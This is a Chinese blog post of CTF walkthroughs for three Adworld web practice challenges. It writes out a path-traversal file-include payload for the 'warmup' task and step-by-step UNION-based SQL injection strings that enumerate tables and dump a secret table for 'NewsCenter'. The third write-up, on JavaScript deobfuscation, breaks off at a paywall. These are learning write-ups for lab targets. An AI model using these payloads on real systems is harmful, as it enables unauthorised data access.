攻防世界web练习18、19、20

最新推荐文章于 2024-07-19 17:26:37 发布
最新推荐文章于 2024-07-19 17:26:37 发布
阅读量203 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/H_S2022/article/details/125768578
版权
攻防世界web练习
摘要由CSDN通过智能技术生成

攻防世界web练习

十八、warmup

http://111.200.241.244:62181/

解题思路:

  1. 进入题目,只有一张图片,查看源代码,发现文件——source.php
  2. 查看source.php,分析代码发现新文件——hint.php
  3. 查看hint.php,提示flag所在的路径为“ffffllllaaaagggg”
  4. 随即构造payload:http://111.200.241.244:62181/source.php?file=hint.php?/…/…/…/…/…/…/ffffllllaaaagggg

考察代码审计能力

标题十九、NewsCenter

http://111.200.241.244:64458/

  1. 进入后,发现有一个搜索框进行新闻搜索,尝试有无sql注入
    输入1’ and 1=1 # 判断有无sql注入,发现有sql注入
  2. 查看列数1’order by 3 #
  3. 首先去爆库:
    1’ union select 1,2,database() #
  4. 库是news,继续爆表:
    1’ union select 1,2,table_name from information_schema.tables where table_schema=‘news’ #
  5. 看到一个secret_table,爆他的列:
    1’ union select 1,2,column_name from information_schema.columns
    where table_name=‘secret_table’ #
  6. 执行查询语句:
    1’ union select 1,id,fl4g from secret_table #

考察手工SQL注入

二十、NaNNaNNaNNaN-Batman

原理:javascript的代码审计、正则表达式

  1. 下载附件,解压,在文件后加上后缀名.html,用浏览器访问,发现是个提交框

  2. 用Sublime Text(记事本都行)打开文件发现是一段javascript代码,并且包含大量控制字符

  3. 复制原文件,进入副本,将eval改成alert

  4. 浏览器访问副本,得到没有乱码的代码

    funcyion $() {
     
    var e = document<
最低0.47元/天 解锁文章
H_S2022
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界WEB新手练习区通关教程
锋刃科技的博客
05-14 771
首先我们不多说直接来到web,新手练习区 view_source 获取场景 右键用不了,我们用F12来检查元素 Robots 我们在url中加上robots.txt 会看到一个php地址,访问即可 Backup Index.php的备份文件,一般备份文件为.bak后缀,访问即可 可以进行爆破文件后缀 Cookie 检查元素中cookie存储发现值为cookie.php,访问 看到消息头中有了flag disabled_button 检查
攻防世界web练习
m0_51295934的博客
02-08 2169
一.view source
xctf攻防世界Web新手练习区 writeup
Senimo
08-08 5187
xctf攻防世界Web新手练习区 writeupview_sourceget_postrobotsbackupcookiedisabled_buttonsimple_jsxff_refererweak_authwebshellcommand_executionsimple_php view_source 难度系数: 1.0 目来源: Cyberpeace-n3k0 目描述:X老师让小宁同学查...
xctf攻防世界Web新手练习
weixin_52146895的博客
12-23 157
前言 这是一个入门WEB目 类型/难度 disabled_button 难度系数: 1.0 内容 图片如下: 解步骤 1:该提示为要用前端知识,则需查看网页源码 2:查看源代码(如图所示): ![在这里插入图片描述](https://img-blog.csdnimg.cn/20201223195015879.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG
攻防世界新手练习web目wp
星|Donstpast
06-12 344
1.view_source 看目就知道这应该是看源码就能找到flag。 打开后我们发现不能右击查看源码,那么我们F12,在查看器里发现flag。 所以提交cyberpeace{e1f66c0513b6d331cd2932f6b51f2769} 2.robots 作为一个web狗,不得不知道roborts,robots.txt是爬虫协议,这其实就是一个遍历目录,将列举出全部内容(前提是服务器存在robots.txt) 我们直接访问robots.txt这个文件,看看有没有(或者正常做法是用御剑等扫描器扫描
xctf攻防世界——web
qq_53893861的博客
12-24 362
入门基础练习 目如下 解步骤 1 获取场景,跳转页面 2 右键鼠标,点击检查, 3 查看源代码,检查问 4 发现 disabled 标签,点击该标签,删除并刷新页面,再点击按钮 5 得到答案 cyberpeace{c917a32d7431bfac5c19efbc76c5cf87} 答结束 ...
Web安全攻防
S1942177831的博客
04-07 3280
攻防世界1.新手练习
自强不息
02-15 390
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
XCTF攻防世界练习区-web(新手)
weixin_50987385的博客
03-07 7158
XCTF攻防世界练习区-web(新手) https://adworld.xctf.org.cn/task?now_checked_num=3&name=web 001 view_source 打开http://111.200.241.244:59441 F12查看源码,发现flag在源码注释中 002 robots 打开http://111.200.241.244:39919/robots.txt 发现存在flag_1s_h3re.php,打开http:.
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此详细解博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此详细解博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此详细解博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界杂项津门杯2021-m1
11-14
攻防世界杂项津门杯2021-m1,misc。 此详细解博客:https://blog.csdn.net/m0_59188912/article/details/127840757
攻防世界running
11-15
攻防世界running杂项,misc。 此详细解博客:https://blog.csdn.net/m0_59188912/article/details/127861757
网络安全防御 -- 双机热备和带宽管理综合实验
rrl18215821889的博客
07-16 553
12,对现有网络进行改造升级,将当个防火墙组网改成双机热备的组网形式,做负载分担模式,游客区和DMZ区走FW3,生产区和办公区的流量走FW1。13,办公区上网用户限制流量不超过100M,其中销售部人员在其基础上限制流量不超过60M,且销售部一共10人,每人限制流量不超过6M。16,外网访问内网服务器,下行流量不超过40M,DMZ中的每台服务器限制对外提供的最大下行带宽不超过20M。做负载分担模式,生产区和办公区的流量走FW1,游客区和DMZ区走FW3。配置g0/0/0ip和开启服务。办公区销售部带宽策略;
网络安全-网络安全及其防护措施8
LS_Ai的博客
07-17 1134
数据中心网络架构是指数据中心内部网络的设计和结构,其目的是提供高性能、高可用性和高扩展性的网络连接。合理的数据中心网络架构能够支持大规模数据处理和传输,满足数据中心的业务需求,提高整体运营效率。负载均衡是一种分配网络流量和计算任务的方法,旨在优化资源利用率、提高系统性能和增强服务可用性。通过将请求分配到多个服务器上,负载均衡避免了单点故障和性能瓶颈,确保系统稳定和高效运行。网络安全策略是指为保护网络和信息系统的安全而制定的一系列规则和措施。
Web安全:未验证的重定向和转发.
最新发布
网络安全领域___专研者.
07-19 547
未验证的重定向和转发漏洞是一种常见的Web安全漏洞,它允许攻击者将用户重定向到一个恶意的URL,而不是预期的安全URL。这种漏洞通常发生在应用程序处理重定向和转发请求时,未能对目标URL进行适当的验证和过滤。
网络安全防御【防火墙双机热备带宽管理综合实验】
miss_copper的博客
07-16 1241
游客区人员不固定,不允许访问DMZ区和生产区,统一使用Guest用户登录,密码Admin@123,游客仅有访问公司门户网站和上网的权利,门户网站地址10.0.3.10。5、生产区访问DMZ区时,需要进行protal认证,设立生产区用户架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab123,12,对现有网络进行改造升级,将当个防火墙组网改成双机热备的组网形式,做负载分担模式,游客区和DMZ区走FW3,生产区和办公区的流量走FW1。链路开启过载保护,保护阈值80%;
攻防世界web fileclude
07-27
攻防世界中的文件包含漏洞(File Inclusion Vulnerability)是一种常见的web安全漏洞。它主要出现在web应用程序中,当应用程序动态包含用户可控制的文件时,如果没有正确过滤和验证用户输入,攻击者可以利用这个漏洞执行恶意代码或读取敏感文件。 文件包含漏洞分为本地文件包含(Local File Inclusion,LFI)和远程文件包含(Remote File Inclusion,RFI)两种类型。LFI漏洞发生在应用程序尝试包含本地文件时,而RFI漏洞则允许攻击者通过远程服务器包含外部文件。 为了防止文件包含漏洞,开发人员应该遵循以下最佳实践: 1. 永远不要信任用户输入。对用户提供的文件名、路径或URL进行严格的输入验证和过滤。 2. 使用白名单机制限制可包含的文件范围。只允许应用程序包含预定义的合法文件,而不是用户可控制的任意文件。 3. 避免使用动态包含,尽量使用静态包含。如果必须使用动态包含,确保只包含可信任的文件。 4. 对于本地文件包含漏洞,限制访问文件系统的权限。确保应用程序只能访问必要的文件,并将敏感文件放在可访问性受限的目录下。 5. 对于远程文件包含漏洞,禁止从远程服务器包含文件,或者使用安全的方法验证和限制远程文件的来源。 6. 定期更新和修补应用程序的漏洞,以确保及时修复已知的文件包含漏洞和其他安全。 这些是一些常见的防范文件包含漏洞的方法,但在实际开发过程中,还需要根据具体情况采取其他安全措施来保护应用程序免受攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值